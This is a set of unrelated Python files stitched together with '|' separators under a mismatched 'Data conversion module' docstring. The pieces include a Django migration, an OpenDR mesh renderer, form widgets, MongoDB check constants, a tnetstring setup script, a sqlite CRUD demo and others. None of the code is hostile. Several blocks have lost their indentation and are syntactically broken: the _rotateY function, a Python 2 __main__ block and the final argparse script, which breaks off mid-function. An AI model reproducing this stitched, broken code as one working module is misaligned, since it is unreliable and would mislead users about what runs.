"""Data conversion module
This module provides functions to
convert between data formats.
"""
|
#!/usr/bin/env python3
from taxtree.tree import createTree
# Build a demo tree; each tuple is passed straight to createTree —
# presumably (score, weight, ids); confirm against taxtree.tree.
tree = createTree([
    (88, 2, [1, 2, 3, 4, 5]),
    (66, 80, [1, 12, 13, 14, 15]),
    (99, 40, [200, 22, 23, 24, 25]),
    (96, 2, [1, 12, 230, 34, 45]),
    (87, 1, [2000, 20, 30, 40, 50]),
])
print(tree)
# Shake with factor 0.2 and print the tree again to show the effect.
tree.shake(.2)
print(tree)
print("lowest common node:")
print(tree.lowestCommonNode())
print("possible outlier:")
print(tree.potentialOutlier())
# print(tree.root)
# for i in [1, 200, 2000]:
# print("----------")
# tree.trim(tree.catalog[i])
# print(tree.root)
#
# tree.trim()
# print(tree)
#
# tree.trim()
# print(tree)
#
# tree.trim()
# print(tree)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-16 07:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: adds a nullable self-referential ``parent``
    foreign key to ``rbac.Permission`` (CASCADE on delete)."""

    dependencies = [
        ('rbac', '0006_menu_weight'),
    ]
    operations = [
        migrations.AddField(
            model_name='permission',
            name='parent',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='rbac.Permission'),
        ),
    ]
|
"""
============================
LASA Handwriting with ProMPs
============================
The LASA Handwriting dataset learned with ProMPs. The dataset consists of
2D handwriting motions. The first and third column of the plot represent
demonstrations and the second and fourth column show the imitated ProMPs
with 1-sigma interval.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from movement_primitives.data import load_lasa
from movement_primitives.promp import ProMP
def draw(T, X, idx, axes, shape_name):
    """Plot one LASA shape: demonstrations (left) and the imitated ProMP
    with its 1-sigma band (right) into the shared axes grid."""
    row, col = divmod(idx, width)
    col = col * 2
    demo_ax = axes[row, col]
    promp_ax = axes[row, col + 1]

    demo_ax.set_title(shape_name)
    demo_ax.plot(X[:, :, 0].T, X[:, :, 1].T)

    promp = ProMP(n_weights_per_dim=30, n_dims=X.shape[2])
    promp.imitate(T, X)
    mean = promp.mean_trajectory(T[0])
    std = np.sqrt(promp.var_trajectory(T[0]))

    promp_ax.plot(mean[:, 0], mean[:, 1], c="r")
    promp_ax.plot(mean[:, 0] - std[:, 0], mean[:, 1] - std[:, 1], c="g")
    promp_ax.plot(mean[:, 0] + std[:, 0], mean[:, 1] + std[:, 1], c="g")
    promp_ax.set_xlim(demo_ax.get_xlim())
    promp_ax.set_ylim(demo_ax.get_ylim())

    for ax in (demo_ax, promp_ax):
        ax.get_yaxis().set_visible(False)
        ax.get_xaxis().set_visible(False)
# Grid layout: `width` shape columns (each takes two axes columns:
# demonstrations + ProMP) and `height` rows.
width = 2
height = 5
fig, axes = plt.subplots(int(height), int(width * 2))
# Load and draw each of the width*height LASA shapes.
for i in range(width * height):
    T, X, Xd, Xdd, dt, shape_name = load_lasa(i)
    draw(T, X, i, axes, shape_name)
plt.tight_layout()
plt.show()
|
"""
Renders mesh using OpenDr for visualization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import cv2
from opendr.camera import ProjectPoints
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
# RGB colors in [0, 1] used to shade the rendered mesh.
colors = {
    # colorblind/print/copy safe:
    'light_blue': [0.65098039, 0.74117647, 0.85882353],
    'light_pink': [.9, .7, .7],  # This is used to do no-3d
}
class SMPLRenderer(object):
    """Thin convenience wrapper around OpenDR for rendering SMPL meshes."""

    def __init__(self,
                 img_size=224,
                 flength=500.,
                 face_path="tf_smpl/smpl_faces.npy"):
        # face_path: .npy file holding the SMPL face (triangle) indices.
        self.faces = np.load(face_path)
        self.w = img_size
        self.h = img_size
        self.flength = flength

    def __call__(self,
                 verts,
                 cam=None,
                 img=None,
                 do_alpha=False,
                 far=None,
                 near=None,
                 color_id=0,
                 img_size=None):
        """
        cam is 3D [f, px, py]
        """
        # Resolution priority: background image > explicit size > defaults.
        if img is not None:
            h, w = img.shape[:2]
        elif img_size is not None:
            h = img_size[0]
            w = img_size[1]
        else:
            h = self.h
            w = self.w

        if cam is None:
            cam = [self.flength, w / 2., h / 2.]

        use_cam = ProjectPoints(
            f=cam[0] * np.ones(2),
            rt=np.zeros(3),
            t=np.zeros(3),
            k=np.zeros(5),
            c=cam[1:3])

        # Default clipping planes bracket the mesh depth range.
        if near is None:
            near = np.maximum(np.min(verts[:, 2]) - 25, 0.1)
        if far is None:
            far = np.maximum(np.max(verts[:, 2]) + 25, 25)

        rendered = render_model(
            verts,
            self.faces,
            w,
            h,
            use_cam,
            do_alpha=do_alpha,
            img=img,
            far=far,
            near=near,
            color_id=color_id)

        return (rendered * 255).astype('uint8')

    def rotated(self,
                verts,
                deg,
                cam=None,
                axis='y',
                img=None,
                do_alpha=True,
                far=None,
                near=None,
                color_id=0,
                img_size=None):
        """Render the mesh rotated by `deg` degrees about its centroid."""
        import math
        rad = math.radians(deg)
        if axis == 'y':
            rot_vec = np.array([0, rad, 0])
        elif axis == 'x':
            rot_vec = np.array([rad, 0, 0])
        else:
            rot_vec = np.array([0, 0, rad])
        rotation = cv2.Rodrigues(rot_vec)[0]
        center = verts.mean(axis=0)
        rotated_verts = np.dot(verts - center, rotation) + center
        return self.__call__(
            rotated_verts,
            cam,
            img=img,
            do_alpha=do_alpha,
            far=far,
            near=near,
            img_size=img_size,
            color_id=color_id)
def _create_renderer(w=640,
                     h=480,
                     rt=None,
                     t=None,
                     f=None,
                     c=None,
                     k=None,
                     near=.5,
                     far=10.):
    """Build an OpenDR ColoredRenderer with the given camera intrinsics.

    Array-valued parameters default to fresh arrays per call — the previous
    version used mutable ``np.zeros(3)`` default arguments, which are
    created once and shared across all calls.
    """
    rt = np.zeros(3) if rt is None else rt
    t = np.zeros(3) if t is None else t
    f = np.array([w, w]) / 2. if f is None else f
    c = np.array([w, h]) / 2. if c is None else c
    k = np.zeros(5) if k is None else k

    rn = ColoredRenderer()
    rn.camera = ProjectPoints(rt=rt, t=t, f=f, c=c, k=k)
    rn.frustum = {'near': near, 'far': far, 'height': h, 'width': w}
    return rn
def _rotateY(points, angle):
"""Rotate the points by a specified angle."""
ry = np.array([[np.cos(angle), 0., np.sin(angle)], [0., 1., 0.],
[-np.sin(angle), 0., np.cos(angle)]])
return np.dot(points, ry)
def simple_renderer(rn,
                    verts,
                    faces,
                    yrot=np.radians(120),
                    color=colors['light_pink']):
    """Render `verts`/`faces` with three Lambertian point lights
    (back-right, left, right), all rotated by `yrot` about the y-axis."""
    # Rendered model color
    rn.set(v=verts, f=faces, vc=color, bgcolor=np.ones(3))
    albedo = rn.vc

    # (light position, light color) for the back, left and right lights.
    light_setup = [
        (np.array([-200, -100, -100]), np.array([1, 1, 1])),
        (np.array([800, 10, 300]), np.array([1, 1, 1])),
        (np.array([-500, 500, 1000]), np.array([.7, .7, .7])),
    ]
    first = True
    for light_pos, light_color in light_setup:
        contribution = LambertianPointLight(
            f=rn.f,
            v=rn.v,
            num_verts=len(rn.v),
            light_pos=_rotateY(light_pos, yrot),
            vc=albedo,
            light_color=light_color)
        if first:
            rn.vc = contribution
            first = False
        else:
            rn.vc = rn.vc + contribution
    return rn.r
def get_alpha(imtmp, bgval=1.):
    """Append an alpha channel that is 0 wherever every channel equals
    `bgval` (pure background) and 1 elsewhere."""
    foreground_mask = ~np.all(imtmp == bgval, axis=2)
    alpha = foreground_mask.astype(imtmp.dtype)
    b, g, r = cv2.split(imtmp)
    return cv2.merge((b, g, r, alpha.astype(imtmp.dtype)))
def append_alpha(imtmp):
    """Append a fully-opaque alpha channel to a 3-channel image
    (255 for uint8 images, 1 otherwise)."""
    alpha = np.ones_like(imtmp[:, :, 0]).astype(imtmp.dtype)
    if np.issubdtype(imtmp.dtype, np.uint8):
        alpha = alpha * 255
    b, g, r = cv2.split(imtmp)
    return cv2.merge((b, g, r, alpha))
def render_model(verts,
                 faces,
                 w,
                 h,
                 cam,
                 near=0.5,
                 far=25,
                 img=None,
                 do_alpha=False,
                 color_id=None):
    """Render a mesh with the given ProjectPoints camera.

    Args:
        verts, faces: Mesh geometry.
        w, h: Output resolution.
        cam: ProjectPoints instance supplying rt/t/f/c.
        near, far: Clipping planes.
        img: Optional background image (white background if None).
        do_alpha: Add an alpha channel to the result.
        color_id: Index into the module-level `colors` palette
            (None -> 'light_blue').

    Returns:
        ndarray: Rendered image in [0, 1], optionally with alpha.
    """
    rn = _create_renderer(
        w=w, h=h, near=near, far=far, rt=cam.rt, t=cam.t, f=cam.f, c=cam.c)

    # Uses img as background, otherwise white background.
    if img is not None:
        rn.background_image = img / 255. if img.max() > 1 else img

    if color_id is None:
        color = colors['light_blue']
    else:
        # list() is required: dict.values() is a non-subscriptable view in
        # Python 3 — the old code raised TypeError whenever color_id was set.
        color_list = list(colors.values())
        color = color_list[color_id % len(color_list)]

    imtmp = simple_renderer(rn, verts, faces, color=color)

    # If white bg, make transparent.
    if img is None and do_alpha:
        imtmp = get_alpha(imtmp)
    elif img is not None and do_alpha:
        imtmp = append_alpha(imtmp)

    return imtmp
# ------------------------------
def get_original(proc_param, verts, cam, joints, img_size):
    """Map predictions from the preprocessed crop back to the original image.

    NOTE(review): the ``img_size`` argument is immediately overwritten by
    ``proc_param['img_size']``; it is kept only for interface compatibility.

    Returns:
        (cam_for_render, vert_shifted, kp_original)
    """
    img_size = proc_param['img_size']
    undo_scale = 1. / np.array(proc_param['scale'])

    flength = 500.
    cam_s = cam[0]
    cam_pos = cam[1:]
    # Depth implied by the weak-perspective camera scale.
    tz = flength / (0.5 * img_size * cam_s)
    vert_shifted = verts + np.hstack([cam_pos, tz])

    principal_pt = np.array([img_size, img_size]) / 2.
    start_pt = proc_param['start_pt'] - 0.5 * img_size
    final_principal_pt = (principal_pt + start_pt) * undo_scale
    cam_for_render = np.hstack(
        [np.mean(flength * undo_scale), final_principal_pt])

    # This is in padded image.
    # kp_original = (joints + proc_param['start_pt']) * undo_scale
    # Subtract padding from joints, then undo the scaling.
    margin = int(img_size / 2)
    kp_original = (joints + proc_param['start_pt'] - margin) * undo_scale

    return cam_for_render, vert_shifted, kp_original
def draw_skeleton(input_image, joints, draw_edges=True, vis=None, radius=None):
    """Draw a 2D skeleton onto a copy of `input_image`.

    joints is 3 x 19. but if not will transpose it.
    0: Right ankle
    1: Right knee
    2: Right hip
    3: Left hip
    4: Left knee
    5: Left ankle
    6: Right wrist
    7: Right elbow
    8: Right shoulder
    9: Left shoulder
    10: Left elbow
    11: Left wrist
    12: Neck
    13: Head top
    14: nose
    15: left_eye
    16: right_eye
    17: left_ear
    18: right_ear

    Args:
        input_image: Image (uint8 or float in [0, 1]).
        joints: 2 x N (or N x 2, transposed automatically) joint positions.
        draw_edges: Also draw the bones between parented joints.
        vis: Optional per-joint visibility flags; 0 entries are skipped.
        radius: Joint circle radius (defaults to ~1% of the image size).

    Returns:
        Annotated copy of the image, in the input's dtype convention.
    """
    import numpy as np
    import cv2

    if radius is None:
        radius = max(4, (np.mean(input_image.shape[:2]) * 0.01).astype(int))

    colors = {
        'pink': np.array([197, 27, 125]),  # L lower leg
        'light_pink': np.array([233, 163, 201]),  # L upper leg
        'light_green': np.array([161, 215, 106]),  # L lower arm
        'green': np.array([77, 146, 33]),  # L upper arm
        'red': np.array([215, 48, 39]),  # head
        'light_red': np.array([252, 146, 114]),  # head
        'light_orange': np.array([252, 141, 89]),  # chest
        'purple': np.array([118, 42, 131]),  # R lower leg
        'light_purple': np.array([175, 141, 195]),  # R upper
        'light_blue': np.array([145, 191, 219]),  # R lower arm
        'blue': np.array([69, 117, 180]),  # R upper arm
        'gray': np.array([130, 130, 130]),  #
        'white': np.array([255, 255, 255]),  #
    }

    image = input_image.copy()
    input_is_float = False

    # np.float was removed from NumPy 1.24; test the abstract float kind.
    if np.issubdtype(image.dtype, np.floating):
        input_is_float = True
        max_val = image.max()
        if max_val <= 2.:  # should be 1 but sometimes it's slightly above 1
            image = (image * 255).astype(np.uint8)
        else:
            image = (image).astype(np.uint8)

    if joints.shape[0] != 2:
        joints = joints.T
    joints = np.round(joints).astype(int)

    jcolors = [
        'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',
        'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',
        'purple', 'purple', 'red', 'green', 'green', 'white', 'white'
    ]

    if joints.shape[1] == 19:
        # parent indices -1 means no parents
        parents = np.array([
            1, 2, 8, 9, 3, 4, 7, 8, 12, 12, 9, 10, 14, -1, 13, -1, -1, 15, 16
        ])
        # Left is light and right is dark
        ecolors = {
            0: 'light_pink',
            1: 'light_pink',
            2: 'light_pink',
            3: 'pink',
            4: 'pink',
            5: 'pink',
            6: 'light_blue',
            7: 'light_blue',
            8: 'light_blue',
            9: 'blue',
            10: 'blue',
            11: 'blue',
            12: 'purple',
            17: 'light_green',
            18: 'light_green',
            14: 'purple'
        }
    elif joints.shape[1] == 14:
        # NOTE(review): this branch previously re-tested == 19 and was
        # unreachable; its 14-entry parents list implies it is meant for
        # 14-joint skeletons — confirm against callers.
        parents = np.array([
            1,
            2,
            8,
            9,
            3,
            4,
            7,
            8,
            -1,
            -1,
            9,
            10,
            13,
            -1,
        ])
        ecolors = {
            0: 'light_pink',
            1: 'light_pink',
            2: 'light_pink',
            3: 'pink',
            4: 'pink',
            5: 'pink',
            6: 'light_blue',
            7: 'light_blue',
            10: 'light_blue',
            11: 'blue',
            12: 'purple'
        }
    else:
        print('Unknown skeleton!!')
        import ipdb
        ipdb.set_trace()

    # xrange does not exist in Python 3.
    for child in range(len(parents)):
        point = joints[:, child]
        # If invisible skip
        if vis is not None and vis[child] == 0:
            continue
        if draw_edges:
            cv2.circle(image, (point[0], point[1]), radius, colors['white'],
                       -1)
            cv2.circle(image, (point[0], point[1]), radius - 1,
                       colors[jcolors[child]], -1)
        else:
            # cv2.circle(image, (point[0], point[1]), 5, colors['white'], 1)
            cv2.circle(image, (point[0], point[1]), radius - 1,
                       colors[jcolors[child]], 1)
            # cv2.circle(image, (point[0], point[1]), 5, colors['gray'], -1)
        pa_id = parents[child]
        if draw_edges and pa_id >= 0:
            if vis is not None and vis[pa_id] == 0:
                continue
            point_pa = joints[:, pa_id]
            cv2.circle(image, (point_pa[0], point_pa[1]), radius - 1,
                       colors[jcolors[pa_id]], -1)
            if child not in ecolors.keys():
                print('bad')
                import ipdb
                ipdb.set_trace()
            cv2.line(image, (point[0], point[1]), (point_pa[0], point_pa[1]),
                     colors[ecolors[child]], radius - 2)

    # Convert back in original dtype
    if input_is_float:
        if max_val <= 1.:
            image = image.astype(np.float32) / 255.
        else:
            image = image.astype(np.float32)

    return image
def draw_text(input_image, content):
    """
    content is a dict. draws key: val on image
    Assumes key is str, val is float

    Keys are rendered in sorted order down the left edge of a copy of the
    image; the copy is returned in the input's dtype convention.
    """
    import numpy as np
    import cv2
    image = input_image.copy()
    input_is_float = False
    # np.float was removed from NumPy 1.24; test the abstract float kind.
    if np.issubdtype(image.dtype, np.floating):
        input_is_float = True
        image = (image * 255).astype(np.uint8)

    black = np.array([0, 0, 0])
    margin = 15
    start_x = 5
    start_y = margin
    for key in sorted(content.keys()):
        text = "%s: %.2g" % (key, content[key])
        cv2.putText(image, text, (start_x, start_y), 0, 0.45, black)
        start_y += margin
    if input_is_float:
        image = image.astype(np.float32) / 255.
    return image
|
from numpy import *
import matplotlib
import matplotlib.pyplot as plt
def file2matrix(filename):
    """Parse the dating data set into features and labels.

    Each line holds three tab-separated feature values followed by a text
    label. Labels map to integers: largeDoses -> 3, smallDoses -> 2,
    anything else (e.g. didntLike) -> 1, as before.

    Returns:
        (ndarray, list): N x 3 feature matrix and integer class labels.
    """
    label_map = {'largeDoses': 3, 'smallDoses': 2}
    # Context manager closes the handle (it was leaked before).
    with open(filename) as fr:
        arrayOLines = fr.readlines()
    returnMat = zeros((len(arrayOLines), 3))  # create matrix
    classLabelVector = []
    # parse file
    for index, line in enumerate(arrayOLines):
        listFromLine = line.strip().split("\t")
        returnMat[index, :] = listFromLine[0:3]
        classLabelVector.append(label_map.get(listFromLine[-1], 1))
    return returnMat, classLabelVector
if __name__ == "__main__":
datingDataMat, datingLabels = file2matrix("./datingTestSet.txt")
print datingDataMat
print "===================="
print datingLabels
#Mat convert to scattergram
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(datingDataMat[:, 0], datingDataMat[:, 1],
15.0*array(datingLabels), 15.0*array(datingLabels))
plt.show() |
from django import forms
from django.conf import settings
from django.forms import Textarea
from django_filters.widgets import RangeWidget
from django_prices.widgets import MoneyInput
from ..account.widgets import PhonePrefixWidget as StorefrontPhonePrefixWidget
class DateRangeWidget(RangeWidget):
    """Range widget rendering two plain date inputs (from/to)."""
    def __init__(self, attrs=None):
        widgets = (forms.DateInput, forms.DateInput)
        # Deliberately skip RangeWidget.__init__ (which would build its own
        # sub-widgets) and call its parent directly with our date widgets.
        # pylint: disable=bad-super-call
        super(RangeWidget, self).__init__(widgets, attrs)
class MoneyRangeWidget(RangeWidget):
    """Range widget rendering two money inputs sharing the default currency."""
    def __init__(self, attrs=None):
        # Direct attribute access: getattr() without a default raised
        # AttributeError on a missing setting anyway, so it added nothing.
        self.currency = settings.DEFAULT_CURRENCY
        widgets = (MoneyInput(self.currency), MoneyInput(self.currency))
        # Deliberately skip RangeWidget.__init__ and call its parent directly
        # so our pre-built MoneyInput widgets are used.
        # pylint: disable=bad-super-call
        super(RangeWidget, self).__init__(widgets, attrs)
class PhonePrefixWidget(StorefrontPhonePrefixWidget):
    """Storefront phone-prefix widget rendered with a dashboard-specific template."""
    template_name = 'dashboard/order/widget/phone_prefix_widget.html'
class RichTextEditorWidget(Textarea):
    """A WYSIWYG editor widget using medium-editor.

    The textarea always carries the 'rich-text-editor' CSS class; caller
    attrs are merged on top and may override it.
    """
    def __init__(self, attrs=None):
        merged = {'class': 'rich-text-editor', **(attrs or {})}
        super().__init__(merged)
|
# Source type reported by this integration.
SOURCE_TYPE_NAME = 'mongodb'

# Name of the connectivity service check.
SERVICE_CHECK_NAME = 'mongodb.can_connect'

# MongoDB replica set states, as documented at
# https://docs.mongodb.org/manual/reference/replica-states/
# (The description was previously a bare triple-quoted string — a no-op
# statement, not an attached docstring — converted to real comments.)
# Mapping: state id -> (short name, human readable description).
REPLSET_MEMBER_STATES = {
    0: ('STARTUP', 'Starting Up'),
    1: ('PRIMARY', 'Primary'),
    2: ('SECONDARY', 'Secondary'),
    3: ('RECOVERING', 'Recovering'),
    4: ('Fatal', 'Fatal'),  # MongoDB docs don't list this state
    5: ('STARTUP2', 'Starting up (forking threads)'),
    6: ('UNKNOWN', 'Unknown to this replset member'),
    7: ('ARBITER', 'Arbiter'),
    8: ('DOWN', 'Down'),
    9: ('ROLLBACK', 'Rollback'),
    10: ('REMOVED', 'Removed'),
}

# Default operation timeout, in seconds.
DEFAULT_TIMEOUT = 30
# Metric submission types accepted for user-defined custom metrics.
ALLOWED_CUSTOM_METRICS_TYPES = ['gauge', 'rate', 'count', 'monotonic_count']
# MongoDB commands accepted in user-defined custom queries.
ALLOWED_CUSTOM_QUERIES_COMMANDS = ['aggregate', 'count', 'find']
def get_state_name(state):
    """Maps a mongod node state id to a human readable string."""
    try:
        return REPLSET_MEMBER_STATES[state][0]
    except KeyError:
        # Unrecognized state ids fall back to a generic label.
        return 'UNKNOWN'
class Deployment(object):
    """Base class describing the type of MongoDB deployment being monitored."""
    def get_available_metrics(self):
        # TODO: Use this method to know what metrics to collect based on the deployment type.
        raise NotImplementedError
class MongosDeployment(Deployment):
    """Deployment reached through a mongos process."""
    def get_available_metrics(self):
        # None: no deployment-specific metric set computed yet (see TODO on base).
        return None
class ReplicaSetDeployment(Deployment):
    """Deployment that is a member of a replica set."""
    def __init__(self, replset_name, replset_state):
        self.replset_name = replset_name
        # Numeric state id as reported by the server (see REPLSET_MEMBER_STATES).
        self.replset_state = replset_state
        # Lower-cased short name, e.g. 1 -> 'primary', 2 -> 'secondary'.
        self.replset_state_name = get_state_name(replset_state).lower()
    def get_available_metrics(self):
        # None: no deployment-specific metric set computed yet (see TODO on base).
        return None
class StandaloneDeployment(Deployment):
    """Single standalone mongod deployment."""
    def get_available_metrics(self):
        # None: no deployment-specific metric set computed yet (see TODO on base).
        return None
|
from abc import ABCMeta, abstractmethod, abstractproperty
from spells import TohsakaException
class BaseSpell(metaclass=ABCMeta):
    """Abstract base class for spells configured from an options dict.

    Subclasses must provide REQUIRED_OPTIONS (a list of mandatory config
    keys) plus the name() and intro() classmethods.

    Raises:
        TohsakaException: if the config is missing required options, or if
            REQUIRED_OPTIONS is not declared as a list.
    """
    def __init__(self, config):
        if not self._validate_config(config):
            raise TohsakaException(f'Invalid options. Expected [{", ".join(self.REQUIRED_OPTIONS)}] Actual [{", ".join(config.keys())}]')
        self.config = config

    def _validate_config(self, options):
        """Return True when every required option key is present in *options*."""
        if not isinstance(self.REQUIRED_OPTIONS, list):
            raise TohsakaException(f'Invalid REQUIRED_OPTIONS. Expected list Actual {type(self.REQUIRED_OPTIONS)}')
        return all(key in options for key in self.REQUIRED_OPTIONS)

    # abc.abstractproperty is deprecated (since Python 3.3); the modern
    # equivalent is stacking @property over @abstractmethod.
    @property
    @abstractmethod
    def REQUIRED_OPTIONS(self):
        raise NotImplementedError

    @classmethod
    @abstractmethod
    def name(cls):  # classmethods receive the class; 'cls', not 'self'
        raise NotImplementedError

    @classmethod
    @abstractmethod
    def intro(cls):
        raise NotImplementedError
|
#
# This is the tnetstring setuptools script.
# Originally developed by Ryan Kelly, 2011.
#
# This script is placed in the public domain.
# If there's no public domain where you come from,
# you can use it under the MIT license.
#
import sys

setup_kwds = {}
if sys.version_info > (3,):
    from setuptools import setup, Extension
    setup_kwds["test_suite"] = "tnetstring.test"
    setup_kwds["use_2to3"] = True
else:
    from distutils.core import setup, Extension

# Python < 2.6 compatibility: provide a next() builtin if it is missing.
try:
    next = next
except NameError:
    def next(i):
        return i.next()

info = {}
try:
    # Read the package __init__.py up to and including the __version__
    # lines, then exec just those lines so __doc__ and __version__ are
    # available without importing the package (its C extension may not be
    # built yet).  Bugfix: the file handle was previously never closed.
    with open("tnetstring/__init__.py") as src:
        lines = []
        ln = next(src)
        while "__version__" not in ln:
            lines.append(ln)
            ln = next(src)
        while "__version__" in ln:
            lines.append(ln)
            ln = next(src)
    exec("".join(lines), info)
except Exception:
    pass

NAME = "tnetstring"
VERSION = info["__version__"]
DESCRIPTION = "data serialization using typed netstrings"
LONG_DESC = info["__doc__"]
AUTHOR = "Ryan Kelly"
AUTHOR_EMAIL = "ryan@rfk.id.au"
URL="http://github.com/rfk/tnetstring"
LICENSE = "MIT"
KEYWORDS = "netstring serialize"
CLASSIFIERS = [
    "Programming Language :: Python",
    "Programming Language :: Python :: 2",
    #"Programming Language :: Python :: 3",
    "Development Status :: 4 - Beta",
    "License :: OSI Approved :: MIT License"
]

setup(name=NAME,
      version=VERSION,
      author=AUTHOR,
      author_email=AUTHOR_EMAIL,
      url=URL,
      description=DESCRIPTION,
      long_description=LONG_DESC,
      license=LICENSE,
      keywords=KEYWORDS,
      packages=["tnetstring","tnetstring.tests"],
      ext_modules = [
          Extension(name="_tnetstring",sources=["tnetstring/_tnetstring.c"]),
      ],
      classifiers=CLASSIFIERS,
      **setup_kwds
     )
|
import os
from AnalysisModule.calculator.descriptors import MolecularDC
from AnalysisModule.routines.data_settings import SDPATH
from AnalysisModule.routines.util import save_pkl, load_pkl
import pandas as pd

# Amines to compute molecular descriptors for.
smis = [
    "NC1CCNCC1",
    "CN(C)C(C)(C)CCN",
    "CCCCCCCCN1CCNCC1",
    "NCC1CCC(CN)CC1",
]

# Compute three descriptor families and join them column-wise.
mdc = MolecularDC(smis)
df1 = mdc.cal_RdkitFrag(smis)
df2 = mdc.cal_Jchem2D(smis)
df3 = mdc.cal_Mordred2D(smis)
df = pd.concat([df1, df2, df3], axis=1)

# Restrict to the descriptor columns already present in the reference
# amine table so the new entries are schema-compatible with it.
original_amine_table = load_pkl("AmineTable.pkl")
original_amine_table_fields = list(list(original_amine_table.values())[0].keys())
df = df[[c for c in df.columns if c in original_amine_table_fields]]
# Diagnostics: how many columns survived and which reference fields are missing.
print(len(df.columns))
print(len(original_amine_table_fields))
print(set(original_amine_table_fields).difference(set(df.columns)))

# Index by SMILES, drop descriptors with any missing value, and persist as
# a {smiles: {descriptor: value}} mapping.
df["smiles"] = smis
mdes_df = df.set_index("smiles")
mdes_df = mdes_df.dropna(axis=1, how='any')
amine2mdes = mdes_df.to_dict("index")
save_pkl(amine2mdes, "extra_amine_table.pkl")
|
import sqlite3
from consola import Consola
from video_juego import VideoJuego
conexion = sqlite3.connect("gamer_db.db")
cursor = conexion.cursor()
cursor.execute("""
CREATE TABLE IF NOT EXISTS consolas
(
id_consola INTEGER PRIMARY KEY NOT NULL,
nombre_consola TEXT,
precio_consola INTEGER
)
""")
cursor.execute("""
CREATE TABLE IF NOT EXISTS video_juegos
(
id_videojuego INTEGER PRIMARY KEY NOT NULL,
nombre_videojuego TEXT,
precio_videojuego INTEGER
)
""")
def insertar_consolas(consola):
    """Insert one console row; the 'with conexion' block commits on success."""
    valores = {
        'id_consola': consola.id_consola,
        'nombre_consola': consola.nombre_consola,
        'precio_consola': consola.precio_consola,
    }
    with conexion:
        cursor.execute("INSERT INTO consolas VALUES(:id_consola, :nombre_consola, :precio_consola)", valores)
        print("Se agregó la consola")
def insertar_juegos(juego):
    """Insert one video game row; the 'with conexion' block commits on success."""
    valores = {
        'id_videojuego': juego.id_videojuego,
        'nombre_videojuego': juego.nombre_videojuego,
        'precio_videojuego': juego.precio_videojuego,
    }
    with conexion:
        cursor.execute("INSERT INTO video_juegos VALUES(:id_videojuego, :nombre_videojuego, :precio_videojuego)", valores)
        print("Se agregó el video juego")
def consultar_consolas():
    """Return every row currently stored in the consolas table."""
    cursor.execute("SELECT * FROM consolas")
    filas = cursor.fetchall()
    return filas
def consultar_juegos():
    """Return every row currently stored in the video_juegos table."""
    cursor.execute("SELECT * FROM video_juegos")
    filas = cursor.fetchall()
    return filas
def modificar_consolas(consola, precio_consola):
    """Update a console's stored price; commits via the 'with conexion' block."""
    valores = {'precio_consola': precio_consola, 'id_consola': consola.id_consola}
    with conexion:
        cursor.execute("UPDATE consolas SET precio_consola = :precio_consola WHERE id_consola = :id_consola", valores)
        print("Se actualizó el precio de la consola:", consola.nombre_consola)
def modificar_juegos(juego, precio_videojuego):
    """Update a video game's stored price; commits via the 'with conexion' block."""
    valores = {'precio_videojuego': precio_videojuego, 'id_videojuego': juego.id_videojuego}
    with conexion:
        cursor.execute("UPDATE video_juegos SET precio_videojuego = :precio_videojuego WHERE id_videojuego = :id_videojuego", valores)
        print("Se actualizó el precio del video juego:", juego.nombre_videojuego)
def eliminar_consolas(consola):
    """Delete a console row by id; commits via the 'with conexion' block."""
    valores = {'id_consola': consola.id_consola}
    with conexion:
        cursor.execute("DELETE FROM consolas WHERE id_consola = :id_consola", valores)
        print("Se eliminó la consola:", consola.nombre_consola)
def eliminar_juegos(juego):
    """Delete a video game row by id; commits via the 'with conexion' block."""
    valores = {'id_videojuego': juego.id_videojuego}
    with conexion:
        cursor.execute("DELETE FROM video_juegos WHERE id_videojuego = :id_videojuego", valores)
        print("Se eliminó el video juego:", juego.nombre_videojuego)
#----------------------------------------------------------------------------#
# Demo: console CRUD round-trip (insert two, list, update one, delete one).
cons_1 = Consola(1, 'xbox', 5000)
cons_2 = Consola(2, 'ps', 5200)
insertar_consolas(cons_1)
insertar_consolas(cons_2)
cns_consola = consultar_consolas()
print(cns_consola)
modificar_consolas(cons_1, 5100)
eliminar_consolas(cons_2)
#----------------------------------------------------------------------------#

#----------------------------------------------------------------------------#
# Demo: video game CRUD round-trip.
game_1 = VideoJuego(1, 'fifa', 800)
game_2 = VideoJuego(2, 'The King of Fighters', 1400)
insertar_juegos(game_1)
insertar_juegos(game_2)
cns_juego = consultar_juegos()
print(cns_juego)
modificar_juegos(game_2, 700)
eliminar_juegos(game_1)
#----------------------------------------------------------------------------#

# Release the shared database connection once the demo is done.
conexion.close()
"""
Fire API Response Metadata
"""
# Standard Library
import datetime
from typing import Any, Dict
# Third Party Code
from dateutil.parser import parse
# Supercell Code
from supercell.breezometer.models.base import BreezoMeterModel
class FiresAPIResponseMetadata(BreezoMeterModel):
    """Fires API Response Metadata Model"""

    # Timestamp parsed from the API response's "timestamp" field.
    timestamp: datetime.datetime
    # Location mapping taken verbatim from the API response's "location"
    # field; assumed str -> str per the annotation — TODO confirm schema.
    location: Dict[str, str]

    def __init__(self, timestamp: datetime.datetime, location: Dict[str, str],) -> None:
        self.location = location
        # The base model stores the timestamp (see BreezoMeterModel).
        super().__init__(timestamp=timestamp)

    def to_str(self) -> str:
        """Return a short human-readable summary of this metadata object."""
        return "{class_name} [{timestamp}]: location={location}".format(
            location=self.location,
            timestamp=self.timestamp.isoformat(),
            class_name=self.__class__.__name__,
        )

    @classmethod
    def initialize_from_dictionary(cls, response_dictionary: Dict[str, Any]):
        """Build an instance from a raw API response dictionary.

        The "timestamp" value is parsed from its string form via dateutil.
        """
        return cls(
            timestamp=parse(response_dictionary["timestamp"]),
            location=response_dictionary["location"],
        )
|
#!/usr/bin/env python
import sys, os, re
import argparse
def main():
parser = argparse.ArgumentParser(description="splits sample sheets and generates STAR-Fusion commands",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--sample_sheet", required=True, help="sample sheet")
parser.add_argument("--cells_per_job", required=False, type=int, default=24, help="number of cells per run")
